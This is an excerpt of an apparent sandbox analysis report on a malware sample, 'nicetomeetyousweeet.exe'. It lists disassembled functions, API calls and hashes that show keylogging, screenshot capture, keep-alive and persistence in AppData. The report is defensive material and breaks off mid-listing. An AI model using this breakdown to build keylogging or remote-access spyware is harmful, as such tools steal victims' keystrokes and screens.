                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorHandling__start
                                                                                • String ID: pow
                                                                                • API String ID: 3213639722-2276729525
                                                                                • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                • Instruction ID: c296867054112a427edbdd16b3baf579c6faf9d8481746a729c2ad46b2c40409
                                                                                • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                • Instruction Fuzzy Hash: 2A517B61A1620196F7117714C98137F2BD0DB50741F688D6BF085423F9DF3D8CDA9A4E
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountEventTick
                                                                                • String ID: >G
                                                                                • API String ID: 180926312-1296849874
                                                                                • Opcode ID: 12cd073fe8d5e9797a5389cba3b852969d6d8c39121b8871935ed4c701e0cacf
                                                                                • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                                                • Opcode Fuzzy Hash: 12cd073fe8d5e9797a5389cba3b852969d6d8c39121b8871935ed4c701e0cacf
                                                                                • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                                                APIs
                                                                                • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Info
                                                                                • String ID: $fD
                                                                                • API String ID: 1807457897-3092946448
                                                                                • Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                                                • Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                                                APIs
                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 007B7D1A
                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 007B7DD3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                • String ID: csm
                                                                                • API String ID: 3480331319-1018135373
                                                                                • Opcode ID: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                                                • Instruction ID: df05c1bb63d14565961804507e97eeb4fc7bd770118659a2236586ea1829dbdd
                                                                                • Opcode Fuzzy Hash: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                                                • Instruction Fuzzy Hash: C241E430A04209EBCF18DF68C884BEEBBB5BF84364F1481A5E9155B392D739DA01CB90
                                                                                APIs
                                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417C08
                                                                                  • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                                                • SHCreateMemStream.SHLWAPI(00000000), ref: 00417C55
                                                                                  • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                                                                  • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                • String ID: image/jpeg
                                                                                • API String ID: 1291196975-3785015651
                                                                                • Opcode ID: 8f3b30371828e1907736ebf26ac10b00a12ebc6a0bae61ebf375912b50c4f4ef
                                                                                • Instruction ID: 3dbe320e324aa312c145f712c1d391ec03548c85c69305bb74e69b0931de3aa8
                                                                                • Opcode Fuzzy Hash: 8f3b30371828e1907736ebf26ac10b00a12ebc6a0bae61ebf375912b50c4f4ef
                                                                                • Instruction Fuzzy Hash: 13315C75508300AFC301AF65C884DAFBBF9FF8A704F000A2EF94597251DB79A905CBA6
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00783C91
                                                                                  • Part of subcall function 0079AD9F: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00783CA7), ref: 0079ADC6
                                                                                  • Part of subcall function 0079791D: CloseHandle.KERNEL32( =x$SF,?,?,00783D20,00465324), ref: 00797933
                                                                                  • Part of subcall function 0079791D: CloseHandle.KERNEL32(?,?,?,00783D20,00465324), ref: 0079793C
                                                                                  • Part of subcall function 0079B881: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00783D5A,00465324), ref: 0079B89A
                                                                                • Sleep.KERNEL32(000000FA,00465324), ref: 00783D63
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                • String ID: 8>G
                                                                                • API String ID: 368326130-2084872820
                                                                                • Opcode ID: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                                                • Instruction ID: e980eb8f3227b4c715b4c3367afeac5c899972c62b37df3d5d0785a01df30c61
                                                                                • Opcode Fuzzy Hash: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                                                • Instruction Fuzzy Hash: 69312131A84218DACF18FB74DC9EEED7775AF80701F404069F506A7193EE685A4ACB91
                                                                                APIs
                                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00797E6F
                                                                                • SHCreateMemStream.SHLWAPI(00000000), ref: 00797EBC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateStream
                                                                                • String ID: image/jpeg
                                                                                • API String ID: 1369699375-3785015651
                                                                                • Opcode ID: c54b99025069d5ee8ebf63b240a23f69e2b107a8cc8e6297c40287d8f8f82ecf
                                                                                • Instruction ID: be20991b3e44c19d5c50f858b07492c5af88ac2ab3e6070ccfba4cdedc1eb8c1
                                                                                • Opcode Fuzzy Hash: c54b99025069d5ee8ebf63b240a23f69e2b107a8cc8e6297c40287d8f8f82ecf
                                                                                • Instruction Fuzzy Hash: 7F314B71514200AFC711AF64C888D6FBBE9FF8A700F00495DF945D7252DB799A09CBA2
                                                                                APIs
                                                                                • GetACP.KERNEL32(?,20001004,?,00000002), ref: 004509B9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ACP$OCP
                                                                                • API String ID: 0-711371036
                                                                                • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                                                • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                                                APIs
                                                                                • GetACP.KERNEL32(?,20001004,?,00000002), ref: 007D0C20
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ACP$OCP
                                                                                • API String ID: 0-711371036
                                                                                • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                • Instruction ID: d4136152631685677459b98a467680a6a1e4efe645c5130b317fee9074bee809
                                                                                • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                • Instruction Fuzzy Hash: 652106A2A48104A6E7348E64DD01BDB73B6EB54B69F569527E909D7300F73ADD00C3E4
                                                                                APIs
                                                                                  • Part of subcall function 007B3780: RtlEnterCriticalSection.NTDLL(00470D18), ref: 007B378B
                                                                                  • Part of subcall function 007B3780: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 007B37C8
                                                                                  • Part of subcall function 007B3B0C: __onexit.LIBCMT ref: 007B3B12
                                                                                • __Init_thread_footer.LIBCMT ref: 0078B10E
                                                                                  • Part of subcall function 007B3736: RtlEnterCriticalSection.NTDLL(00470D18), ref: 007B3740
                                                                                  • Part of subcall function 007B3736: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 007B3773
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                • String ID: ,]G$0]G
                                                                                • API String ID: 2974294136-589576501
                                                                                • Opcode ID: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                                                • Instruction ID: 4cd5f0721b34d023b7ddc23c79f17431d86dd8faebab4be895c90b3f06391489
                                                                                • Opcode Fuzzy Hash: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                                                • Instruction Fuzzy Hash: AE218531A4010CDACB14FBB4D89EEEEB735AF54311F50402AE5056B1A3EF2C6E4AC795
                                                                                APIs
                                                                                  • Part of subcall function 0079277A: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 0079279E
                                                                                  • Part of subcall function 0079277A: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 007927BB
                                                                                  • Part of subcall function 0079277A: RegCloseKey.ADVAPI32(?), ref: 007927C6
                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0078B9D3
                                                                                • PathFileExistsA.SHLWAPI(?), ref: 0078B9E0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                • String ID: TUF
                                                                                • API String ID: 1133728706-3431404234
                                                                                • Opcode ID: d94b965c273a091329a6f5a73edda4c14bb16021ab9e8e668cdf3b753880c9a9
                                                                                • Instruction ID: 14d2ca01cbfb990e46c4163e644ffc152c40abcae2ac3db581971bd41978a025
                                                                                • Opcode Fuzzy Hash: d94b965c273a091329a6f5a73edda4c14bb16021ab9e8e668cdf3b753880c9a9
                                                                                • Instruction Fuzzy Hash: C1216231A80209EACB14F7B4DD5FDEE77696F14701F500165B902A7283FF69990AC7A2
                                                                                APIs
                                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417CF4
                                                                                  • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417D19
                                                                                  • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                                                                  • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                • String ID: image/png
                                                                                • API String ID: 1291196975-2966254431
                                                                                • Opcode ID: 3eb8dd80f54a72a5a0a9ed13ccec69a705e73992219fab643a786ff0acabb055
                                                                                • Instruction ID: e3b7944e5392015f30009faa46d0af48502643625c308f0969f1fef2cb3c76d4
                                                                                • Opcode Fuzzy Hash: 3eb8dd80f54a72a5a0a9ed13ccec69a705e73992219fab643a786ff0acabb055
                                                                                • Instruction Fuzzy Hash: AA21A135204211AFC300AF61CC88CAFBBBDEFCA714F10052EF90693151DB399945CBA6
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                Strings
                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LocalTime
                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                • API String ID: 481472006-1507639952
                                                                                • Opcode ID: 9eb55951fabd34ca0bb1d07baae63512bdae916bc2a115767729c70cbd458cad
                                                                                • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                                                • Opcode Fuzzy Hash: 9eb55951fabd34ca0bb1d07baae63512bdae916bc2a115767729c70cbd458cad
                                                                                • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 00784C58
                                                                                  • Part of subcall function 0079A8ED: GetLocalTime.KERNEL32(00000000), ref: 0079A907
                                                                                • GetLocalTime.KERNEL32(?), ref: 00784CB5
                                                                                Strings
                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 00784C4C
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LocalTime
                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                • API String ID: 481472006-1507639952
                                                                                • Opcode ID: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                                                • Instruction ID: dee1f4dff377f8c604d5363c69c1b7ad82f28c5d6cd73b961a34aed6c3c03a53
                                                                                • Opcode Fuzzy Hash: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                                                • Instruction Fuzzy Hash: 1A210871A45240ABC710F7289C0E76ABBD457D5301F54046DF94903263EBAC558A87AB
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LocalTime
                                                                                • String ID: | $%02i:%02i:%02i:%03i
                                                                                • API String ID: 481472006-2430845779
                                                                                • Opcode ID: 619e3ed541efa4aa09b7a1d695d1d57e01108c7d68543a13579d8524fcb85e28
                                                                                • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                                                • Opcode Fuzzy Hash: 619e3ed541efa4aa09b7a1d695d1d57e01108c7d68543a13579d8524fcb85e28
                                                                                • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                                                APIs
                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 00786A9C
                                                                                  • Part of subcall function 007869CB: _wcslen.LIBCMT ref: 007869EF
                                                                                  • Part of subcall function 007869CB: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 00786A50
                                                                                • CoUninitialize.COMBASE ref: 00786AF5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InitializeObjectUninitialize_wcslen
                                                                                • String ID: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe
                                                                                • API String ID: 3851391207-232929776
                                                                                • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                • Instruction ID: 6e86decbc005f1853bf1892efbb756bef9114f0d1fea23cc258257d39f141850
                                                                                • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                • Instruction Fuzzy Hash: D4019E72385711BBE2287B21DC4EF7B7758DF41766F21812EFA419B181EAA9EC004762
                                                                                APIs
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00792879
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007928AF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: QueryValue
                                                                                • String ID: TUF
                                                                                • API String ID: 3660427363-3431404234
                                                                                • Opcode ID: b09a7c0ab263ba9602d255bab372d31fcc1af682bb43ba0fd7320c28ba140ab5
                                                                                • Instruction ID: 951e120faf07649d7e7824f8ca85d9ba41de01828a42f4ec1ab6b57a53bbecec
                                                                                • Opcode Fuzzy Hash: b09a7c0ab263ba9602d255bab372d31fcc1af682bb43ba0fd7320c28ba140ab5
                                                                                • Instruction Fuzzy Hash: 35014FB6A00108FFEF04AB95DC4AEFE7ABDEB48251F14407AF901E2241E6B59F009770
                                                                                APIs
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExistsFilePath
                                                                                • String ID: alarm.wav$xIG
                                                                                • API String ID: 1174141254-4080756945
                                                                                • Opcode ID: e9ed3ee058f202d1f9c7932032e2a2c9931c4f06c7ec149372ddb4776638e356
                                                                                • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                                                • Opcode Fuzzy Hash: e9ed3ee058f202d1f9c7932032e2a2c9931c4f06c7ec149372ddb4776638e356
                                                                                • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                                                APIs
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0079A115
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExistsFilePath
                                                                                • String ID: TUF$xIG
                                                                                • API String ID: 1174141254-2109147017
                                                                                • Opcode ID: 2fae138b2d3ec9b0a0b8c660c1a787d1356efb4be69c0d9f0b79cf6aaa7c8617
                                                                                • Instruction ID: 40e34c3d307383d9a926e827ed6b65a6f92320510842cece824baa8623cae804
                                                                                • Opcode Fuzzy Hash: 2fae138b2d3ec9b0a0b8c660c1a787d1356efb4be69c0d9f0b79cf6aaa7c8617
                                                                                • Instruction Fuzzy Hash: 6801B160784305E6CE28F674A81FAAE37558B81751F50802AF85A472E3EF6C9946C3DB
                                                                                APIs
                                                                                  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                • String ID: Online Keylogger Stopped
                                                                                • API String ID: 1623830855-1496645233
                                                                                • Opcode ID: 5261c192baa11886afb01b4bdc85cc0cf986bdca5956bb61acdae837da7fee36
                                                                                • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                                                • Opcode Fuzzy Hash: 5261c192baa11886afb01b4bdc85cc0cf986bdca5956bb61acdae837da7fee36
                                                                                • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                                                APIs
                                                                                  • Part of subcall function 0078AADD: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0078AAEB
                                                                                  • Part of subcall function 0078AADD: wsprintfW.USER32 ref: 0078AB6C
  • Part of subcall function 0079A8ED: GetLocalTime.KERNEL32(00000000), ref: 0079A907
• CloseHandle.KERNEL32(?), ref: 0078AA31
• UnhookWindowsHookEx.USER32 ref: 0078AA44
Memory Dump Source
• Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
Similarity
• API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
• String ID: Online Keylogger Stopped
APIs
• FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,rFx,00000000,00000000,00475B70), ref: 0079BF05
• LocalFree.KERNEL32(?,rFx,?,?,?,?,?,?,?,?,00784672), ref: 0079BF2B
Memory Dump Source
• Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
Similarity
• API ID: FormatFreeLocalMessage
• String ID: rFx
APIs
• IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
Similarity
• API ID: LocaleValid
• String ID: IsValidLocaleName$j=D
APIs
• GetKeyState.USER32(00000011), ref: 0040AD5B
  • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
  • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
  • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
  • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
  • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
  • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
